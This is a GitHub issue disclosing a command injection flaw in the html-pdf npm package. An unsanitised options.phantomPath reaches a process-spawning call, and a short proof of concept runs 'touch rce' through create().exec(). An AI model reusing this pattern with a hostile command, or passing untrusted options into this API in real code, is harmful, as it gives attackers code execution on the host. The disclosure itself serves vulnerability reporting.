marcbachmann / node-html-pdf

This repo isn't maintained anymore as phantomjs got deprecated a long time ago. Please migrate to headless chrome/puppeteer.
MIT License

Potential injection vulnerability in node-html-pdf #701

Open xiaofen9 opened 1 year ago

xiaofen9 commented 1 year ago

Hi,

We would like to report a potential security vulnerability. The bug is introduced because the package-exported method create() fails to sanitize its parameter options.phantomPath and lets it flow into a sensitive command execution API.

Here is the proof of concept.

```js
var fs = require('fs');
// 'html-pdf' is the published npm name of marcbachmann/node-html-pdf
var htmltopdf = require('html-pdf');
var html = fs.readFileSync('example.html', 'utf8');
var options = {
  // attacker-controlled executable path: create() passes it straight to the process-spawning API
  phantomPath: 'touch',
  // attacker-controlled argv for that executable
  phantomArgs: ['rce'],
  readLocalFile: true
};

var pdf = htmltopdf.create(html, options);
// exec() spawns options.phantomPath with options.phantomArgs; a file named rce will be created
pdf.exec(function (err, result) {
  if (err) console.error(err);
});
```

Please consider fixing it. thanks!